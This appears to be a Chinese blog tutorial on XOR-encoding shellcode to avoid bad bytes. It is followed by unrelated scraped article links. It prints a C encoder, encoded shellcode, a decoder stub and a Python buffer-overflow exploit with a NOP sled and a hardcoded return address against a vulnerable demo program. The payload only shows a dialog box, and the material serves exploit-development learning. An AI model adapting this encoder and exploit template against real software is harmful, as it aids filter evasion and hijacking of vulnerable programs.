在很多漏洞利用场景中, shellcode 的内容将会受到限制。

例如你不能输入 \x00 这个字符,编辑框不能输入 \x0d \x0a这样的字符

所以需要完成 shellcode 的逻辑,然后使用编码技术对 shellcode 进行编码,使其内容达到限

制的要求,最后再精心构造十几个字节的解码程序,放在 shellcode 开始执行的地方。

当 exploit 成功时, shellcode 顶端的解码程序首先运行,它会在内存中将真正的 shellcode

还原成原来的样子,然后执行。这种对 shellcode 编码的方法和软件加壳的原理非常类似。

这样,我们只需要专注于几条解码指令,使其符合限制条件就行,相对于直接关注于整段shellcode 来说使问题简化了很多。

  • 由上一篇文章提取出来的机器码,进行最简单的加密,异或
  • 目标:还是我第一篇文章中共享的dig.exe含漏洞的程序

功能为弹出对话框,然后退出程序

#include<stdlib.h>

#include<string.h>

void encoder(char* input, unsigned char key)

{

	int i = 0, len = 0;

	FILE * fp;

    len = strlen(input);

	unsigned char * output = (unsigned char *)malloc(len + 1);

	for (i = 0; i<len; i++)

		output[i] = input[i] ^ key;

	fp = fopen("encode.txt", "w+");

	fprintf(fp, "\"");

	for (i = 0; i<len; i++)

	{

		fprintf(fp, "\\x%0.2x", output[i]);

		if ((i + 1) % 16 == 0)

			fprintf(fp, "\"\n\"");

	}

	fprintf(fp, "\"");

	fclose(fp);

	printf("dump the encoded shellcode to encode.txt OK!\n");

	free(output);

}

int _tmain(int argc, _TCHAR* argv[])

{

	char sc[] =

		"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"

		"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"

		"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"

		"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"

		"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"

		"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"

		"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"

		"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"

		"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"

		"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"

		"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90";

	encoder(sc, 0x51);

	getchar();

	return 0;

}

注意: 在进行异或操作时,key不能与原机器码中的数值一样,否则运算结束后会有0,而 0 是字符串的结尾,不能做为输入字符

在加密结束后,要检查输出的加密shellcode中是否有 0d(\r) 0a(\n)这样的字符这样的字符同样不能输入

我试了大约20次不同的key才找到一个0x51可以使用,有时间我再把他改成自动挑选shellcode的代码吧...

  • 在放置shellcode的时候,我翻了一次车

在上次实验中,shllcode比较小没问题

可是这次shellcode比较大,大到了已经可以覆盖上一个函数栈帧的的eip了

如果在按照左图的布局方式,会出现一些我目前还无法解释错误

经过多次翻车后,我开始按照右图的布局方式来做

为了减小shllcode的体积,增加shellcode的灵活性,建议以后也按照右图的方式布局

(如果文中有错误的地方,请批评指正,谢谢!)

先在栈中写 一大片 nop 这样eip之后的jmp就可以不用控制的很精确也可以跳到shellcode

只要 jmp 击中了 nop 就好了

#shellcode 脱壳程序

shellcode  = "\x89\xe0"			      #mov eax,esp

shellcode += "\x05\xec\xfe\xff\xff"

shellcode += "\x83\xC0\x1b"		      #ADD EAX,1b  使eax指向加密数据

shellcode += "\x33\xC9"		          #XOR ECX,ECX

shellcode += "\x8A\x1C\x08"		      #MOV BL,BYTE PTR DS:[EAX+ECX]

shellcode += "\x80\xF3\x51"	          #XOR BL,51

shellcode += "\x88\x1C\x08"		      #MOV BYTE PTR DS:[EAX+ECX],BL

shellcode += "\x41"			          #INC ECX

shellcode += "\x80\xFB\x90"		      #CMP BL,90H

shellcode += "\x75\xF1"			      #JNE

#加了壳的真实shellcode

shellcode += "\xad\x39\x3b\x5b\x69\x4f\x39\x32\xd8\x80\x1e\x39\x63\x25\xc0\x5d"

shellcode += "\xda\xa5\xdc\x2f\xa5\x62\x8a\xe6\x55\x7a\xb2\x37\xea\x62\x63\x02"

shellcode += "\x39\x24\x22\x34\x23\x05\x62\x83\x35\xda\x0b\x61\xda\x1a\x5d\xda"

shellcode += "\x18\x4d\xda\x58\xda\x38\x59\xfc\x6c\x3b\x5b\x69\x4f\x24\x54\xc4"

shellcode += "\xae\x06\xa9\xc4\x31\xda\x14\x6d\xda\x1d\x54\x29\x52\x9c\xda\x08"

shellcode += "\x71\x52\x8c\x62\xae\x16\xda\x65\xea\x52\xa4\xc8\x5e\xef\x57\x6b"

shellcode += "\x95\x25\x59\x90\x9b\x56\x52\x81\x17\xba\xa0\x6a\x05\x75\x4d\x24"

shellcode += "\xb5\xda\x08\x75\x52\x8c\x37\xda\x6d\x2a\xda\x08\x4d\x52\x8c\x52"

shellcode += "\x7d\xea\xc4\x0e\xfa\x06\x30\x6c\x3b\x5b\x69\x4f\x24\xf8\x62\x8a"

shellcode += "\x02\x39\x26\x34\x22\x25\x39\x37\x30\x38\x3d\xda\x95\x02\x01\x01"

shellcode += "\x02\xae\x06\xad\x02\xae\x06\xa9\xc1"

shellcode += '\x90'*0x50

eip = '\x73\x15\xbf\x7d'    #shell32.dll <call esp>	0x7dbf1573

junk = '\x90' * (997-len(shellcode))

jmp  = "\xe9\xdf\xfe\xff\xff"			

#payload

payload = junk +  shellcode + eip + jmp

#将payload写入到文件payload.txt

fp = open("payload.txt","w")

fp.write(payload)

fp.close()

print "[+]payload"
  • mov eax,esp 后,eax为eip的下一个位置(jmp)这个地方
  • 在上段代码中 hex(len(shellcode)) 可以得到shellcode的长度
  • 然后 sub eax 这个长度就可以让eax 指向shellcode的开关

    sub eax,0x114 的机器码为 2D 14010000,我们的字符串中不能存在 \0 字符

    所以不能用减法了,改为加法

    add 0x114的补码就没有 \0 字符了

    esp 当前位置并不是在shellcode尾部,所以eax应该加0x11c的补码

  • 然后eax加上解密的shllcode的长度,指向加密的shllcode的数据
  • 我的shellcode解密出来最后一位是 \x90,遇到 \x90就向下运行

如果解完密的shellcode与自己写的shllcode不一样,那就换一个key重新加密一次,数据可能在复制过程中发生了改变

小建议:生成的字符串用winHex打开,可以获得最大的准确性

shellcode 编码技术的更多相关文章

  1. H264编码技术

    H.264的目标应用涵盖了眼下大部分的视频服务,如有线电视远程监控.交互媒体.数字电视.视频会议.视频点播.流媒体服务等.H.264为解决不同应用中的网络传输的差异.定义了两层:视频编码层(VCL:V ...

  2. 音视频编解码技术(二):AAC 音频编码技术

    一.AAC编码概述 AAC是高级音频编码(Advanced Audio Coding)的缩写,出现于1997年,最初是基于MPEG-2的音频编码技术,目的是取代MP3格式.2000年,MPEG-4标准 ...

  3. PHP加密与编码技术

    md5加密: string  md5( string $str [,bool $raw output=false]) md5加密方法用的挺多,有两个参数,第一个参数是要加密的字符串,第二个参数默认为f ...

  4. H264编码技术[3]

    H.264的目标应用涵盖了目前大部分的视频服务,如有线电视远程监控.交互媒体.数字电视.视频会议.视频点播.流媒体服务等.H.264为解决不同应用中的网络传输的差异.定义了两层:视频编码层(VCL:V ...

  5. Redis 数据结构与编码技术 (Object Encoding)

    数据结构实现 相信大家对 redis 的数据结构都比较熟悉: string:字符串(可以表示字符串.整数.位图) list:列表(可以表示线性表.栈.双端队列.阻塞队列) hash:哈希表 set:集 ...

  6. iOS视频硬编码技术

    iOS视频硬编码技术 一.iOS视频采集硬编码 基本原理 硬编码 & 软编码 硬编码:通过系统自带的Camera录制视频,实际上调用的是底层的高清编码硬件模块,即显卡,不使用CPU,速度快 软 ...

  7. 哈夫曼编码(Huffman coding)的那些事,(编码技术介绍和程序实现)

    前言 哈夫曼编码(Huffman coding)是一种可变长的前缀码.哈夫曼编码使用的算法是David A. Huffman还是在MIT的学生时提出的,并且在1952年发表了名为<A Metho ...

  8. 直播平台搭建之音视频开发:认识主流视频编码技术H.264

    H.264简介 什么是H.264?H.264是一种高性能的视频编解码技术.目前国际上制定视频编解码技术的组织有两个,一个是"国际电联",它制定的标准有H.261.H.263.H.2 ...

  9. 常用音频协议介绍&&有关音频编码的知识与技术参数

    (转载)常用音频协议介绍 会议电视常用音频协议介绍及对比白皮书 一.数字化音频原理:声音其实是一种能量波,因此也有频率和振幅的特征,频率对应于时间轴线,振幅对应于电平轴线.通常人耳可以听到的频率在20 ...

随机推荐

  1. MySQL基础之 标准模式通配符

    MySQL标准魔兽通配符 作用:在搜索数据库中的数据时,SQL通配符可以替代一个或多个字符 注意:标准模式SQL通配符必须与LIKE运算符一起使用 1.%  通配符 作用:匹配一个或多个字符. 找出以 ...

  2. [技术] OIer的C++标准库 : 字符串库

    引入 上次我在博客里介绍了OI中可能用到的STL中的功能, 今天我们接着来发掘C++标准库中能为OI所用的部分. 点击传送至我的上一篇系列博文 众所周知, OI中经常用到字符串相关的处理, 这时善用字 ...

  3. 死磕nginx系列--使用nginx做负载均衡

    使用nginx做负载均衡的两大模块: upstream 定义负载节点池. location 模块 进行URL匹配. proxy模块 发送请求给upstream定义的节点池. upstream模块解读 ...

  4. pycharm同步

    只有专业版的才能同步服务器 按照这个来:https://zhuanlan.zhihu.com/p/35067462 3.然后配置映射信息 local path是自己的工程的本地目录路径, Deploy ...

  5. nginx静态文件缓存的解决方案

    nginx的一大功能就是完成静态资源的分离部署,减轻后端服务器的压力,如果给这些静态资源再加一级nginx的缓存,可以进一步提升访问效率. 第一步:添加nginx.conf的http级别的缓存配置 # ...

  6. opencv——对象计数

     思路: 1.通过形态学操作.阈值处理.距离变换等方法,使得各个轮廓分开 2.计算轮廓数量 #include <opencv2/opencv.hpp> #include <iostr ...

  7. javascript实现拖曳与拖放图片

    javascript实现拖曳与拖放图片 其实对于drag和drop拖曳与拖放事件IE很早以前就支持这个操作了,我们先来看看HTML5中新增的拖放API. 在HTML5中想要实现拖放操作,至少要做以下操 ...

  8. opencv 显示摄像头数据

    本文章是一个小例子,主要是在ubuntu 系统中利用Opencv 显示摄像头的数据 ,显示到对话框中. 1.建立一个  main.cpp #include<opencv2/core/core.h ...

  9. jqgrid 配置分页大小及下拉项

    如何配置分页大小的下拉项?显示效果如下: 通过 rowNum 来设置默认分页大小 通过 rowList 来设置分页下拉.   rowList 的值为一个数组,比如:[10,20,30] $(" ...

  10. 50Hz工频干扰消除

    50Hz工频干扰消除 今天整理工频干扰消除算法. 我们知道,设计数字滤波器,和模拟滤波器的实质,其实就是求一组系数,逼近要求的频率响应. 模拟滤波器已经很成熟,因此,数字滤波器的设计,将S平面映射到Z ...